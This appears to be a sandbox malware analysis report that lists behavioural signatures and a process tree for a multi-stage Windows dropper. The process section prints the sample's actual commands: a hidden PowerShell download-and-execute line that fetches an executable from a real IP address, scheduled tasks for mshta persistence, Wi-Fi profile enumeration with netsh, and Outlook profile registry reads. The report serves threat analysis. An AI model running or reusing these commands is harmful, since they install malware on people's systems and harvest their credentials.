Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\561b99cbf5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\49309c0b92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\1f3ecc566c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\a53c2ef5e2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5830bccfba.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\68a19ce725.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 4712 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 4712 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 4712 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 764 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 764 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 764 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1756 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 2896 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2896 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
PID 2896 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
PID 2896 wrote to memory of 2932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE
PID 2932 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2932 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2932 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 796 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 796 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 796 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 4028 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 4028 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 4028 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 4028 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 4028 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 4028 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2848 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 3152 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3152 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3152 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3152 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3152 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3152 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3152 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3152 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3152 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2848 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\cmd.exe
PID 4408 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4408 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4408 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4408 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4408 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4408 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe
PID 796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe
PID 796 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe
PID 4936 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\mshta.exe
PID 4936 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\mshta.exe
PID 4936 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe C:\Windows\SysWOW64\mshta.exe
PID 2796 wrote to memory of 3272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 3272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 3272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 684 wrote to memory of 4960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 796 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Build.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn OdMxkmaweBS /tr "mshta C:\Users\Admin\AppData\Local\Temp\zbIoMqsNd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE

"C:\Users\Admin\AppData\Local\TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"

C:\Users\Admin\AppData\Local\Temp\Build.exe

"C:\Users\Admin\AppData\Local\Temp\Build.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2848 -ip 2848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2848 -s 2436

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\0c6733a3b9.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn OXTLVmaes7i /tr "mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\eZLOEW1ax.hta

C:\Windows\SysWOW64\schtasks.exe

